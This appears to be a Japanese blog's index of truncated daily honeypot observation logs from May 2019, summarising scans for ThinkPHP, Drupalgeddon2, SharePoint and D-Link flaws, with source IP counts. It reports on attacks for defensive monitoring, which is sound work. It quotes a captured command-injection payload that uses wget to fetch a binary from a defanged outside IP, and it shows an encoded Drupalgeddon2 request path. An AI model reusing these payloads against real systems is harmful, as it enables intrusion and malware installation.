ハニーポット(仮) 観測記録 2019/05/30分です。ThinkPHPの脆弱性狙いのアクセス Drupalgeddon2(CVE-2018-7600)狙いのアクセス Referrer部分にSQL文が仕込まれたリクエスト を確認しました。総アクセス数：1402 (前日比：+736)都合により GET / HTTP/1.1 POST…

ハニーポット(仮) 観測記録 2019/05/29分です。ThinkPHPの脆弱性狙いのアクセス Drupalgeddon2(CVE-2018-7600)狙いのアクセス Referrer部分にSQL文が仕込まれたリクエスト を確認しました。Microsoft SharePointの脆弱性（CVE-2019-0604）狙いのアクセス DGN…

ハニーポット(仮) 観測記録 2019/05/28分です。Drupalgeddon2(CVE-2018-7600)狙いのアクセス Referrer部分にSQL文が仕込まれたリクエスト を確認しました。総アクセス数：592 (前日比：-166)都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。送信…

ハニーポット(仮) 観測記録 2019/05/27分です。ThinkPHPの脆弱性狙いのアクセス Drupalgeddon2(CVE-2018-7600)狙いのアクセス Referrer部分にSQL文が仕込まれたリクエスト を確認しました。総アクセス数：758 (前日比：+533)都合により GET / HTTP/1.1 POST …

ハニーポット(仮) 観測記録 2019/05/26分です。phpmyadmin関連のスキャンも戻ってきました。D-Linkを狙ったリクエストを観測しました。 ThinkPHP狙いのアクセスを観測しました。 Referrer部分にSQL文が仕込まれたリクエスト を確認しました。総アクセス数：2…

ハニーポット(仮) 観測記録 2019/05/25分です。アクセス数も少なく、落ち着いた1日でした。 送信元IPはほぼChinaでした。総アクセス数：29 (前日比：+7)都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。送信元IPアドレス一覧 件数 送信元IPアド…

ハニーポット(仮) 観測記録 2019/05/24分です。アクセス数も少なく、落ち着いた1日でした。 ThinkPHP狙いのアクセスは継続しています。総アクセス数：22 (前日比：-1827)都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。送信元IPアドレス一覧 件…

ハニーポット(仮) 観測記録 2019/05/23分です。ThinkPHPの脆弱性狙いのアクセス Drupalgeddon2(CVE-2018-7600)狙いのアクセス Referrer部分にSQL文が仕込まれたリクエスト を確認しました。総アクセス数：1849 (前日比：-1995)都合により GET / HTTP/1.1 POS…

ハニーポット(仮) 観測記録 2019/05/22分です。ThinkPHPの脆弱性狙いのアクセス Drupalgeddon2(CVE-2018-7600)狙いのアクセス Referrer部分にSQL文が仕込まれたリクエスト を確認しました。総アクセス数：3844 (前日比：+3157)都合により GET / HTTP/1.1 POS…

ハニーポット(仮) 観測記録 2019/05/21分です。ThinkPHPの脆弱性狙いのアクセス Drupalgeddon2(CVE-2018-7600)狙いのアクセス Referrer部分にSQL文が仕込まれたリクエスト を確認しました。ZmEuでのスキャンを仕掛けて来たIPはUSのものでした。総アクセス数…

ハニーポット(仮) 観測記録 2019/05/20分です。Drupalgeddon2(CVE-2018-7600)狙いのアクセス ThinkPHPの脆弱性狙いのアクセス が継続しています。総アクセス数：1928 (前日比：+52)都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。送信元IPアド…

ハニーポット(仮) 観測記録 2019/05/19分です。Drupalgeddon2(CVE-2018-7600)狙いのアクセス ThinkPHPの脆弱性狙いのアクセス が継続しています。UserAgentにAmazon CloudFrontが入っているリクエストが継続しています。総アクセス数：1876 (前日比：+1856)…

2019/05/18 ハニーポット(仮) 観測記録 ハニーポット(仮) 観測記録 2019/05/18分です。件数的には落ち着いた1日でした。D-Linkの脆弱性を狙うアクセスを確認しました。UserAgentにAmazon CloudFrontが入っているリクエストを確認しました。 /api/v1/timeのパ…

ハニーポット(仮) 観測記録 2019/05/17分です。Drupalgeddon2(CVE-2018-7600)狙いのアクセス ThinkPHPの脆弱性狙いのアクセス が継続しています。Referrer部分にSQL文が仕込まれたリクエストを確認しました。 アクセス先のパスは/user.phpでしたHIKVISION（…

Trivy A Simple and Comprehensive Vulnerability Scanner for Containers, Suitable for CI というツールをtwitterで見たので、試してみました。 これはコンテナ脆弱性スキャナのデファクトになる / GitHub - knqyf263/trivy: A Simple and Comprehensive V…

ハニーポット(仮) 観測記録 2019/05/16分です。アクセス数が増加しました。Drupalgeddon2(CVE-2018-7600)狙いのアクセスが継続しています。 ThinkPHPの脆弱性狙いのアクセスを観測しました。Referrer部分にSQL文が仕込まれたリクエストを確認しました。 アク…

ハニーポット(仮) 観測記録 2019/05/15分です。Drupalgeddon2(CVE-2018-7600)狙いのアクセスを確認しました。 /%75%73%65%72/%72%65%67%69%73%74%65%72?%65%6c%65%6d%65%6e%74%5f%70%61%72%65%6e%74%73=%74%69%6d%65%7a%6f%6e%65%2f%74%69%6d%65%7a%6f%6e%65…

ハニーポット(仮) 観測記録 2019/05/14分です。Drupalgeddon2(CVE-2018-7600)狙いのアクセスを複数確認しました。総アクセス数：604 (前日比：+560)都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。送信元IPアドレス一覧 件数 送信元IPアドレス …

ハニーポット(仮) 観測記録 2019/05/13分です。アクセス数としては落ち着いた1日でしたが ThinkPHPの脆弱性狙いのアクセスは継続しています。総アクセス数：44 (前日比：-764)都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。送信元IPアドレス一…

ハニーポット(仮) 観測記録 2019/05/12分です。ThinkPHPの脆弱性狙いのアクセスが継続しています。総アクセス数：808 (前日比：-996)都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。送信元IPアドレス一覧 件数 送信元IPアドレス 国 565 115.249…

ハニーポット(仮) 観測記録 2019/05/11分です。ThinkPHPの脆弱性狙いのアクセス Drupalgeddon2(CVE-2018-7600)狙いのアクセス が継続しています。CVE-2017-10271狙いのアクセスがありました。Referrer部分にSQL文が仕込まれたリクエストを本日は確認しました…

ハニーポット(仮) 観測記録 2019/05/10分です。ThinkPHPの脆弱性狙いのアクセスが継続しています。クエリ部分にwgetを仕込んできたアクセスがありました。 cli=aa aa'; wget http://93[.]188[.]163[.]62/dsl2750b'$Drupalgeddon2(CVE-2018-7600)狙いのアクセ…

ハニーポット(仮) 観測記録 2019/05/09分です。ThinkPHPの脆弱性狙いのアクセスが継続しています。 Referrer部分にSQL文が仕込まれたリクエストも継続しています。総アクセス数：1192 (前日比：-577)都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いていま…

ハニーポット(仮) 観測記録 2019/05/08分です。ThinkPHPの脆弱性狙いのアクセスが継続しています。Referrer部分にSQL文が仕込まれたリクエストも継続しています。Drupalgeddon2（CVE-2018-7600）狙いのアクセスがいました。総アクセス数：1769 (前日比：+101…

ハニーポット(仮) 観測記録 2019/05/07分です。GW期間中の分は昨日、公開だけになりましたがUPしました。 コメントも再開です。ThinkPHPの脆弱性狙いのアクセスが継続しています。Referrer部分にSQL文が仕込まれたリクエストを確認しました。GW直前に公開さ…

ハニーポット(仮) 観測記録 2019/05/06分です。総アクセス数：717 (前日比：-1823)都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。送信元IPアドレス一覧 件数 送信元IPアドレス 国 6 101.227.249.121 China 1 115.29.223.75 China 556 117.78.3…

ハニーポット(仮) 観測記録 2019/05/05分です。総アクセス数：2540 (前日比：+1241)都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。送信元IPアドレス一覧 件数 送信元IPアドレス 国 1 113.240.229.189 China 399 120.95.241.19 China 565 122.1…

ハニーポット(仮) 観測記録 2019/05/04分です。総アクセス数：1299 (前日比：-599)都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。送信元IPアドレス一覧 件数 送信元IPアドレス 国 1 128.14.209.154 United States 1 128.14.209.226 United Sta…

ハニーポット(仮) 観測記録 2019/05/03分です。総アクセス数：1898 (前日比：+148)都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。送信元IPアドレス一覧 件数 送信元IPアドレス 国 164 122.14.213.82 China 1 123.56.49.19 China 1 128.14.209.…

ハニーポット(仮) 観測記録 2019/05/02分です。総アクセス数：1750 (前日比：+1199)都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。送信元IPアドレス一覧 件数 送信元IPアドレス 国 10 101.89.95.197 China 1 104.131.103.14 United States 1 1…